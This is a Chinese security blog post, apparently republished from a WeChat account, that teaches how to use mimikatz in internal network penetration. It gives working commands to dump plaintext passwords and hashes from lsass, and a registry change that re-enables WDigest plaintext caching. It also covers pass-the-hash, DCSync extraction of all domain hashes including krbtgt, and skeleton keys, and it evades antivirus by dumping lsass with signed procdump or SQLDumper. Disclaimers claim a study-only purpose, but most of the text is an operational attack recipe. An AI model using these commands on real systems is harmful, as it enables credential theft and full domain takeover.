内网渗透工具mimikatz

admin 2025年6月7日10:27:07评论3 views字数 2251阅读7分30秒阅读模式
内网渗透工具mimikatz

点击蓝字

关注我们

内网渗透工具mimikatz

始于理论,源于实践,终于实战

老付话安全,每天一点点

激情永无限,进步看得见

内网渗透工具mimikatz

严正声明

本号所写文章方法和工具只用于学习和交流,严禁使用文章所述内容中的方法未经许可的情况下对生产系统进行方法验证实施,发生一切问题由相关个人承担法律责任,其与本号无关。

特此声明!!!

内网渗透工具mimikatz

mimikatz

内网渗透工具mimikatz

mimikatz轻量级调试神器,可以提升进程权限、注入进程、读取进程内存,可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码(sass是微软Windows系统的安全机制它主要用于本地安全和登陆策略)。包括从Windows系统中提取明文密码、Kerberos票据以及密码哈希等敏感信息。

内网渗透工具mimikatz

运行使用

内网渗透工具mimikatz

在网络上下载mimikatz

内网渗透工具mimikatz

在X64中有.exe应用程序,右击以管理员运行(注意:杀毒软件会把它杀掉,需要关闭所有杀毒软件)

内网渗透工具mimikatz

运行后如下:

内网渗透工具mimikatz

输入privilege::debug提升权限 

内网渗透工具mimikatz

 输入sekurlsa::logonpasswords,抓取密码

内网渗透工具mimikatz

注:win10或2012R2以上版本,默认在内存缓存中禁止保存明文密码,但是可以通过修改注册表读到hash值。在cmd管理员权限下输入reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f,

再运行sekurlsa::logonpasswords,即可!

Hash传递

获取到NTLM哈希值,可以使用mimikatz对其进行哈希传递,使用以下命令

Sekurlsa::pth /user:XX /domian:http://xx.com /ntlm:XXXXXXXX

内网渗透工具mimikatz

mimikatz常用命令

内网渗透工具mimikatz
  • privilege::debug //提升权限

  • sekurlsa::logonpasswords //抓取密码

  • kerberos::list //列出存储票据

  • kerberos::purge //清空存储票据

  • kerberos::ptt XX.XX //导入票据

  • lsadump::dcsync /domain:http://XXXX.com /all /csv //获取所有域用户  

  • lsadump::dcsync /domain:http://XXXX.com /user:XXX //指定获取某个用户的hash 

  • lsadump::dcsync /domain:http://xx.com /user:krbtgt //获取krbtgt的用户hash

  • misc::skeleton //添加万能密钥

内网渗透工具mimikatz

mimikatz高级应用

内网渗透工具mimikatz

上面说,有杀毒软件会杀毒mimikatz,所以在使用这个工具就没法在目标机器上运行,这就需要用其他办法解决这个问题;因为系统登录用户名密码一般存在lsass.exe进程中,只要能获取到这个文件就可以在能够使用mimikatz的设备在进行密码获取。有三个文件可以合法获取lsass.exe进程,分别是Procdump.exeSQLDumper.execreatedump.exe,他们是微软签名的合法程序。

  • Procdump.exe用于转储进程内存,用Procdump 抓取lsass进程dmp文件:procdump64.exe -accepteula -ma lsass.exe lsass_dump,然后再配合mimikatz使用:

sekurlsa::Minidump

 lsassdump.dmpsekurlsa::logonPasswords

还可以通过PID来获取

procdump64.exe -accepteula -ma pid lsass_dum

  • Sqldumper.exe实用工具是在 Microsoft SQL Server 中。 用于调试目的SQL Server和相关进程的内存转储。window系统自带,可以在一些目录下找到:

C:Program FilesMicrosoft SQL Server100SharedSqlDumper.exeC:Program FilesMicrosoft Analysis ServicesAS OLEDB10SQLDumper.exeC:Program Files (x86)Microsoft SQL Server100SharedSqlDumper.e

使用以下命令查看lsass.exe 的PID号 

tasklist /svc | findstr lsass.exe 

 导出mdmp文件

Sqldumper.exe ProcessID 0 0x01100 

在本地使用相同版本操作系统解密即可

mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" exit

Mimikatz模块还可以在Metasploit中加载,

use post/windows/gather/credentials/mimikatz

使用help mimikatz查看使用命令

内网渗透工具mimikatz

kerberos模块:用于抓取kerberos证书

livessp模块:检索livessp凭据

mimikatz_command:可以让我们使用mimikatz的全部功能

内网渗透工具mimikatz

msv模块:列出密码哈希

SSP模块:抓取SSP证书,安全支持提供程序(SSP)是Windows API,用于扩展Windows身份验证机制。

tspkg模块:抓取tspkg证书。

END

内网渗透工具mimikatz

老付

内网渗透工具mimikatz

欢迎扫码

关注我们

网络安全

内网渗透工具mimikatz
内网渗透工具mimikatz
内网渗透工具mimikatz

原文始发于微信公众号(老付话安全):内网渗透工具mimikatz

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月7日10:27:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网渗透工具mimikatzhttps://cn-sec.com/archives/3801954.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息